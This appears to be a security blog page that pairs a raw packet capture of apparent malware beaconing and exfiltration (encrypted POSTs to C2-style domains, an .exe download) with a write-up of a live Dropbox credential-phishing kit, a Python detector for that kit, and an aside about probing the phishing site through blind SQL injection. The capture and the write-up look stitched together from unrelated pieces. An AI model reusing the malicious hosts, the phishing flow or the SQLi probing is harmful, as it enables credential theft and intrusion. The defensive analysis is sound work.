E..(O…..a….f..
}.T..z…..<.P………….
2016-08-25 20:42:49.840829 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [P.], seq 0:77, ack 1, win 260, length 77
E..uO…..a….f..
}.T..z…..<.P………..H…D..W..b
Y.c.w.R…’O…:……R(..d……..
.       .d.b………c………
2016-08-25 20:42:50.068322 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [.], ack 748, win 257, length 0
E..(O…..a….f..
}.T..z…..>.P….K……..
2016-08-25 20:42:50.081419 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [P.], seq 77:267, ack 748, win 257, length 190
E…O…..a0…f..
}.T..z…..>.P…0……………J,z;….k..od.c..m..J.6……/…,Y..’…..#{..g…L..s..O.>s…….Q… j._=…S..i…q{..l.g.N….gf..l……L.u..|”.5H…. ………..(.S.!O….4……….o….S.U..I.0.l.Tx..
2016-08-25 20:42:50.299317 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [.], ack 799, win 257, length 0
E..(O…..a….f..
}.T..z…..?.P….Y……..
2016-08-25 20:42:50.452744 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [P.], seq 267:365, ack 799, win 257, length 98
E…O…..a….f..
}.T..z…..?.P…2………n…..sg=P..{..`..s*f……@-‘(l.&.l…h.[.._…-3g………..*.I.T9″……..(.7..gPm…….
2016-08-25 20:42:50.661372 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [F.], seq 365, ack 1676, win 260, length 0
E..(O…..a….f..
}.T..z…..B.P………….
2016-08-25 20:42:50.662103 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [S], seq 1111764833, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4O.@…!….f..
}.U..BD/a…… ..(…………..
2016-08-25 20:42:50.662234 IP 192.168.1.102.51798 > 188.166.10.125.443: Flags [S], seq 247285886, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4O.@…!….f..
}.V….H~…… ……………..
2016-08-25 20:42:50.833009 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [.], ack 1677, win 260, length 0
E..(O…..a….f..
}.T..z…..B.P………….
2016-08-25 20:42:50.834539 IP 192.168.1.102.51798 > 188.166.10.125.443: Flags [.], ack 4265457260, win 260, length 0
E..(O…..a….f..
}.V….H..=.lP…M………
2016-08-25 20:42:50.835151 IP 192.168.1.102.51798 > 188.166.10.125.443: Flags [P.], seq 0:109, ack 1, win 260, length 109
E…O…..ay…f..
}.V….H..=.lP….G……h…d..W..c..k.
P(..B……^.N.6..)..aC ..7w…U8………+…..f…$O………
.       .d.b………c………

2016-08-25 20:42:52.087758 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 215796, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5……….
2016-08-25 20:42:52.088179 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 218316, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5……….
2016-08-25 20:42:52.088938 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 220836, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5.@……..
2016-08-25 20:42:52.089497 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 223356, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2._P..5.h……..
2016-08-25 20:42:52.090208 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 225876, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2.7P..5}………
2016-08-25 20:42:52.090816 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 228396, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5s………
2016-08-25 20:42:52.091466 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 230916, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5i………
2016-08-25 20:42:52.092047 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 233436, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5`………
2016-08-25 20:42:52.093266 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 235956, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5V0……..
2016-08-25 20:42:52.093882 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 238476, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2.oP..5LX……..

2016-08-25 20:42:52.519472 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [S], seq 864782611, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4    .@…c….f\?o..X.P3……… .9……………
2016-08-25 20:42:52.681083 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [.], ack 2746851228, win 260, length 0
E..(    ……….f\?o..X.P3…….P…V7……..
2016-08-25 20:42:52.681582 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [P.], seq 0:343, ack 1, win 260, length 343: HTTP: GET /module/96df1c84c7fb13e880e399f9627e0db0 HTTP/1.1
E…    ……….f\?o..X.P3…….P….0..GET /module/96df1c84c7fb13e880e399f9627e0db0 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; WIN32)
Host: 92.63.111.173

2016-08-25 20:42:53.381648 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [.], ack 99559, win 260, length 0
E..(    ……….f\?o..X.P3..k..$.P………….
2016-08-25 20:42:53.753273 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [P.], seq 343:686, ack 99559, win 260, length 343: HTTP: GET /module/311ac29c5a8f6b4e7a247db98207fd6e HTTP/1.1
E…    ……….f\?o..X.P3..k..$.P…….GET /module/311ac29c5a8f6b4e7a247db98207fd6e HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; WIN32)
Host: 92.63.111.173

2016-08-25 20:42:54.597357 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [P.], seq 686:1029, ack 128966, win 1046, length 343: HTTP: GET /module/a104f2955999a2f1a1c881e8930b82f6 HTTP/1.1
E…    ……….f\?o..X.P3……aP…tp..GET /module/a104f2955999a2f1a1c881e8930b82f6 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; WIN32)
Host: 92.63.111.173

2016-08-25 20:42:55.538846 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [P.], seq 1029:1372, ack 219620, win 1087, length 343: HTTP: GET /module/d1967c99c0c7f9b468f2e08e59e41ffe HTTP/1.1
E…
……a…f\?o..X.P3…….P..?.2..GET /module/d1967c99c0c7f9b468f2e08e59e41ffe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; WIN32)
Host: 92.63.111.173

2016-08-25 20:42:55.975976 IP 192.168.1.102.51801 > 188.166.10.125.443: Flags [P.], seq 267:749, ack 799, win 257, length 482
E..
P\…._`…f..
}.Y….. !..{P….!…….Y.^s..`…..G…b..7……….<.t.M.vt:_..u..PV.adc../n.]D…H\N.U.xv.^…x..
..#Y.0.V…k.oz.D…N..|8……….R..9.s.(.1&..S……2…….Dx…..*..4……g..u.@….=![…..1.b:.9….L>EK…….B$.”`;…._.gU.Jx.h.E…8…:{n.C…M.
………t..R.7b.<……………”f..MIE……-…c..x..l….cwU1#.p.B…T$<….w..z.;.:F.9.C6Rj..@e..a@A.c..z.Ex..5…0tYA.(d.c..0W:….x.V.. ..BC. .My……X..1.x.k…..yr..r.4.”..g0…Gg..$s#.X_…._…qJ.%..d>…i.y.EO.[.d=a…1…r.:..|
2016-08-25 20:42:55.977244 IP 192.168.1.102.51801 > 188.166.10.125.443: Flags [P.], seq 749:2209, ack 799, win 257, length 1460
E…P]….[….f..
}.Y……!..{P…………J
.(}…..(“.Ekd.uSfM.i
…8.if.5..H…!…U..-J…_W.[…A~….T….R  …L|.#a.”4..Z..r.Y_.!nV.Kc..<.,.9….V..&..4z.UF..>#.. .6….t……..3..?.|..
…….|^…c;;…..@w……..D..$J.:*..T…v.y……I80.n.t..i{….x.O.’.w…….I..2……..~
.y.f…..X…’..E..Z.Xm.N..rLc  .|..c…|-.,9`t…HN..&v!……..1i….b..0.\.\.X….am………<…P..b5…&   …     E|..5..
…     …D.0!..(…@…I.,”..<..m….^…..c..C.-..1…Q….v…….]..{..XX..B.g7….,I.C.w8.n8.7…OY.#..’R…)..#..k.)t.`..3..ky….Y.9…….8……..=.H…h..$.g.(0…..L8..pc..z.>l.).&..ZLgxN_LC..X4…..Z…. ..SG….|.i…T8….._|…i.~.
.f.J…….mX..O{.L?.e.r…..
..c…P.Ei.r.R8..H{….F…b…*O….
.N../.
/..+..C……B.DI.?………..’…..`…G.1…..A…….y.D…..:.d..^.>.h…*.XF…..N..?._…….Q…Q….gqP..*.3gb…….:…a…..2.\….V………E~..(.. ..M!Y.Mv……y..’….h .0..%j..H..w..%.(….W…L…d.!.I<pp.0FTQ..:.,|F……JT…./.D.3….2.ie-..W%K.P.%.6…a.@’..ID.K9=.q.;{…2…r.^.X}..]…T…….zq.7E..8   .A..W….ka.tw…C).J3…2……..t.>|..).FU/…l-…7.T…”3…..7.
`K.y…~O.0…..nL….4zKU..IU.^.m…[x.!……..4>.-….p..2.J.n6..E..3…..=……..?….G2….B.6;F..
…….
t+.#.b…l.Q…..B8….E…A……}..Fu.. .BA65.
……`.}.`….Z….N..j{%……w….Q……..x.8../.ojR..W.Y…m…..?..~…V..%..zw.._9.T.}….2.’…….L…K…f……..

2016-08-25 20:43:56.038455 IP 192.168.1.102.51809 > 37.187.148.135.80: Flags [P.], seq 0:737, ack 1, win 256, length 737: HTTP: POST /cgi-bin/create_profile.cgi HTTP/1.1
E..     ?,….|r…f%….a.PVG……P…….POST /cgi-bin/create_profile.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 1240229404
x-spidermessenger-length: 271
Content-Type: text/*
User-Agent: sun21-SunnyDay21
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 388
Cache-Control: no-cache
Cookie: conftime=1472172015; EoRezo=73.172.154.70.1472172015145032

ujXl2iaEv38JRlMCJUzLFNBZ%2FYStRVI1KxpSzMDulRbtDqiqtedG%2Ba9lkB3czzWEVk2q%2BpKe%2BzYM3pyfaM0nZHytTY7H3hmmB%2FeOkC0gLXBl7L%2FxN6fq%2F7%2BgUk3j%2Bx6GmvQfdkf5Kstyif%2FXbpP%2BXMdPE4fI3g3F2KBFPLOG9Q6%2FRvwmoBVICRmM5Y08YbUJMmtMhO%2FFAlSqvxZM7RDfvqJrq9%2BdXdEh0NPsKAaqQz1y%2F85cCMdBQpnLv3EKRVigYb8Hq9UoEBwOwUFskoJkCh0B6anwMwz1qhjY8EbqZ47zDyZowM1CgDPEl%2FCXJ8ZCduedPSrZ6ABN1b1zvFq1%2FUuQW0%2BCwbag
2016-08-25 20:43:56.203003 IP 192.168.1.102.51809 > 37.187.148.135.80: Flags [.], ack 1135, win 252, length 0
E..(?-…..R…f%….a.PVG…..?P………….
2016-08-25 20:43:56.203846 IP 192.168.1.102.51809 > 37.187.148.135.80: Flags [F.], seq 737, ack 1135, win 252, length 0
E..(?……Q…f%….a.PVG…..?P………….
2016-08-25 20:43:56.707723 IP 192.168.1.102.51810 > 37.187.137.144.80: Flags [S], seq 163765992, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4?.@…I….f%….b.P        ……… .*Y…………..
2016-08-25 20:43:56.806333 IP 192.168.1.102.51810 > 37.187.137.144.80: Flags [.], ack 2999876834, win 256, length 0
E..(?……….f%….b.P        …..|.P…Zk……..
2016-08-25 20:43:56.806770 IP 192.168.1.102.51810 > 37.187.137.144.80: Flags [P.], seq 0:627, ack 1, win 256, length 627: HTTP: POST /cgi-bin/trace.cgi HTTP/1.1
E…?……A…f%….b.P        …..|.P…….POST /cgi-bin/trace.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 1808263860
x-spidermessenger-length: 259
Content-Type: text/*
User-Agent: sun21-SunnyDay21
Host: log.hmmmilikethat.com
Content-Length: 366
Cache-Control: no-cache

YlFEYq03QpPOdyhwgx6Zd5nR4%2Fs11wdRmVxOegjv%2BLSbuf0%2BAAHXschZmrR23ej7XPDIsfC2dKLEwcBQCeDZfRV3FanrpoqUZ18LjuNjFows9otFCVECIXEZRbn7wupVK8vF2hGr8TlcYhjcVv%2BqYdmbLUMp2h%2BrcOb1oN5mi4kjTQYAh14wHS34yjVTqzR9HJUyit3KypHufUNEUWEl8ROP5HXQePsN98TcSjhVf6E%2FhFApsD84W8klJjeYOI2gZ4NxoNOi6VFa7fTcH5no4TJL9ABC7lIQGsi3m%2B%2Fq86zqcufgWuZBTJyJvIebPKq0RL73bonMtJnQ%2BRP1Tjhc6Q%3D%3D

2016-08-25 20:43:58.162750 IP 192.168.1.102.51812 > 178.32.139.58.80: Flags [P.], seq 0:360, ack 1, win 256, length 360: HTTP: GET /download/2/wizzrelease.exe?jUrMqP9yIX5h5h6UFcUJeXtGlI87%2FDHI8ysr%2FnlKCVAh6bPF1YlSGMQBF8SUNejYppAll8HBVYK3uD9XuscO7S4V1eR%2B8joqvZ%2Foe1pMiStyXO6su9nx7GI00Qva0OA3XuydsPp7H1b1IYf%2BKYVUlLI18diFuxN4 HTTP/1.1
Accept: */*
Content-Type: text/*
User-Agent: sun21-SunnyDay21
Host: download.cleanshot.host
Connection: Keep-Alive
Cache-Control: no-cache


2016-08-25 20:44:31.215512 IP 192.168.1.102.51814 > 95.211.100.91.16044: Flags [S], seq 2478522633, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-08-25 20:44:31.357256 IP 192.168.1.102.51814 > 95.211.100.91.16044: Flags [.], ack 4209888609, win 256, length 0
2016-08-25 20:44:31.411755 IP 192.168.1.102.12102 > 146.158.119.2.22235: UDP, length 60
2016-08-25 20:44:31.951881 IP 192.168.1.102.63747 > 209.85.201.125.5222: Flags [P.], seq 1522:1575, ack 54, win 253, length 53
2016-08-25 20:44:32.357745 IP 192.168.1.102.51814 > 95.211.100.91.16044: Flags [P.], seq 0:288, ack 1, win 256, length 288
2016-08-25 20:44:32.531071 IP 192.168.1.102.51814 > 95.211.100.91.16044: Flags [P.], seq 288:752, ack 305, win 255, length 464
2016-08-25 20:44:32.558893 IP 192.168.1.102.51699 > 149.56.103.125.10911: Flags [P.], seq 12672:13728, ack 3169, win 256, length 1056
2016-08-25 20:44:32.599513 IP 192.168.1.102.51699 > 149.56.103.125.10911: Flags [P.], seq 13728:14784, ack 3169, win 256, length 1056


ALERT! Very Active PHISHING CAMPAIGN still alive targeting Dropbox Users

I received the link via e-mail but also found it online through some redirects and a Dropbox typo domain name.

The images and page look spot on… but if you look at the URI, like you should, you’ll notice right away that we have some problems here!

http://glabalinvestment.tk/cost/DROP1/casts/

dropbox_phishing

 

The campaign steals your Gmail, Yahoo, MSN, AOL or other e-mail account credentials as well as your Dropbox account – once your e-mail is compromised, attackers don’t have much trouble taking over the rest of your accounts with that infamous “reset your password” or “I forgot my password” button.

 

So… let’s play this out – I’ll input some information and we can see what happens.

 

2016-08-21 08:51:27.817436 IP 192.168.1.100.33910 > 94.102.50.50.80: Flags [P.], seq 1:324, ack 1, win 229, options [nop,nop,TS val 32169711 ecr 2715205929], length 323: HTTP: GET /cost/DROP1/casts/ HTTP/1.1
Host: glabalinvestment.tk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

2016-08-21 08:51:28.123701 IP 192.168.1.100.33910 > 94.102.50.50.80: Flags [.], ack 14778, win 463, options [nop,nop,TS val 32169788 ecr 2715206245], length 0
2016-08-21 08:51:28.137743 IP 94.102.50.50.80 > 192.168.1.100.33910: Flags [P.], seq 14778:16226, ack 324, win 122, options [nop,nop,TS val 2715206260 ecr 32169762], length 1448: HTTP
…'), local('OpenSans-Light'), url(dropbox_files/DXI1ORHCpsQm3Vp6mXoaTXhCUOGz7vYGh680lGh-uXM.woff) format('woff');
}
@font-face {
font-family: 'Open Sans';
font-style: normal;
font-weight: 400;
src: local('Open Sans'), local('OpenSans'), url(dropbox_files/cJZKeOuBrn4kERxqtaUH3T8E0i7KZn-EPnyo3HZu7kw.woff) format('woff');

 

—– Now I’ll POST my credentials:

 

2016-08-21 08:55:37.958321 IP 192.168.1.100.33922 > 94.102.50.50.80: Flags [P.], seq 1:532, ack 1, win 229, options [nop,nop,TS val 32232246 ecr 2715456053], length 531: HTTP: POST /cost/DROP1/casts/ HTTP/1.1
Host: glabalinvestment.tk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://glabalinvestment.tk/cost/DROP1/casts/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 83

hidCflag=&Email=blah12311%40gmail.com&Passwd=yourgoingdown&signIn=Sign+in&rmShown=1
2016-08-21 08:55:38.088463 IP 94.102.50.50.80 > 192.168.1.100.33922: Flags [.], ack 532, win 122, options [nop,nop,TS val 2715456199 ecr 32232246], length 0
2016-08-21 08:55:38.167398 IP 94.102.50.50.80 > 192.168.1.100.33922: Flags [P.], seq 1:298, ack 532, win 122, options [nop,nop,TS val 2715456282 ecr 32232246], length 297: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Sun, 21 Aug 2016 12:54:56 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
X-Powered-By: PHP/5.6.22
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

3

 

2016-08-21 08:55:38.365148 IP 94.102.50.50.80 > 192.168.1.100.33922: Flags [P.], seq 298:401, ack 532, win 122, options [nop,nop,TS val 2715456485 ecr 32232298], length 103: HTTP

<script type="text/javascript">
<!--
window.location="verification.php"

</script>

 

UHHHHHHHHHHH – WHAT??? SITE IS PRETENDING TO GOOGLE VERIFY ME!

 

2016-08-21 08:55:38.372853 IP 192.168.1.100.33922 > 94.102.50.50.80: Flags [P.], seq 532:926, ack 406, win 237, options [nop,nop,TS val 32232350 ecr 2715456485], length 394: HTTP: GET /cost/DROP1/casts/verification.php HTTP/1.1
Host: glabalinvestment.tk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://glabalinvestment.tk/cost/DROP1/casts/
Connection: keep-alive

 

Selection_006

 

2016-08-21 09:00:13.756038 IP 192.168.1.100.33930 > 94.102.50.50.80: Flags [P.], seq 1:554, ack 1, win 229, options [nop,nop,TS val 32301196 ecr 2715731847], length 553: HTTP: POST /cost/DROP1/casts/verification.php HTTP/1.1
Host: glabalinvestment.tk
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://glabalinvestment.tk/cost/DROP1/casts/verification.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

challengetype=PhoneVerificationChallenge&phoneNumber=4438481234&recEmail=

2016-08-21 09:00:14.208222 IP 94.102.50.50.80 > 192.168.1.100.33930: Flags [P.], seq 298:404, ack 554, win 122, options [nop,nop,TS val 2715732299 ecr 32301248], length 106: HTTP

<script type="text/javascript">
<!--
window.location="https://dropbox.com";

</script>

 

Selection_007

 

 

This is a good example of sleight of hand: if you had been watching a movie or barely paying attention, you may have entered your credentials into the phishing site, been reassured when you saw what looked like the standard Google verification prompt, and, after you put in any phone number or e-mail (it obviously doesn’t check), been redirected to the place you thought you were going all along, which is the real dropbox.com.
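A defender-side detector for the flow just described, written for this post as an added example (it is neither the phishing kit's code nor the original author's): it walks constructed HTTP transactions modelled on the capture above and flags a login form POSTed to a host outside Dropbox's own domain that is later followed by a JavaScript bounce to the real dropbox.com. The transaction record layout, the allow-list and the field names treated as password-like are assumptions for this example.

```python
import re
from urllib.parse import parse_qs, urlparse

# Brand the cloned page imitates and the only domains that should ever
# receive its login form (constructed allow-list for this example).
BRAND = "dropbox"
LEGIT_DOMAINS = {"dropbox.com", "www.dropbox.com"}
CREDENTIAL_FIELDS = {"passwd", "password", "pass", "pwd"}
REDIRECT_RE = re.compile(r'window\.location\s*=\s*["\']([^"\']+)["\']', re.I)


def same_registrable_domain(host, domains):
    """True if host equals, or is a subdomain of, one of the allowed domains."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def posts_credentials(body):
    """Does a urlencoded form body carry a password-like field?"""
    fields = {k.lower() for k in parse_qs(body, keep_blank_values=True)}
    return bool(fields & CREDENTIAL_FIELDS)


def redirect_target(response_body):
    """Host named by a window.location redirect, or None if relative/absent."""
    m = REDIRECT_RE.search(response_body)
    if not m or "://" not in m.group(1):
        return None
    return urlparse(m.group(1)).hostname


def find_phishing_flows(transactions):
    """Return (host, path, reason) for each credential POST to a non-brand host."""
    alerts = []
    for i, tx in enumerate(transactions):
        if tx["method"] != "POST" or not posts_credentials(tx["req_body"]):
            continue
        if same_registrable_domain(tx["host"], LEGIT_DOMAINS):
            continue  # the form went where it belongs
        reason = "credential POST to non-%s host" % BRAND
        # The kit's give-away ending: a later response from the same host
        # bounces the victim to the real brand site.
        for later in transactions[i:]:
            dest = redirect_target(later["resp_body"]) if later["host"] == tx["host"] else None
            if dest and same_registrable_domain(dest, LEGIT_DOMAINS):
                reason += "; JS redirect to real %s afterwards" % dest
                break
        alerts.append((tx["host"], tx["path"], reason))
    return alerts


# Constructed transactions modelled on the capture shown in this post.
SAMPLE = [
    {"host": "glabalinvestment.tk", "method": "GET", "path": "/cost/DROP1/casts/",
     "req_body": "", "resp_body": "<html>cloned Dropbox login page</html>"},
    {"host": "glabalinvestment.tk", "method": "POST", "path": "/cost/DROP1/casts/",
     "req_body": "hidCflag=&Email=blah12311%40gmail.com&Passwd=yourgoingdown&signIn=Sign+in&rmShown=1",
     "resp_body": '<script type="text/javascript">window.location="verification.php"</script>'},
    {"host": "glabalinvestment.tk", "method": "POST", "path": "/cost/DROP1/casts/verification.php",
     "req_body": "challengetype=PhoneVerificationChallenge&phoneNumber=4438481234&recEmail=",
     "resp_body": '<script type="text/javascript">window.location="https://dropbox.com";</script>'},
]

if __name__ == "__main__":
    for host, path, reason in find_phishing_flows(SAMPLE):
        print("ALERT %s%s: %s" % (host, path, reason))
```

The phone-verification POST on its own raises nothing, since it carries no password field; the alert comes from the first POST and is enriched by the later redirect to the real site.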

 

Ironically enough, the phishing site has a blind SQLi vulnerability; we were not able to grab a shell, but we did get a good count of how many victims they have already hit thus far by looking at the auto-incrementing primary key ID value, which was as high as 11,200.
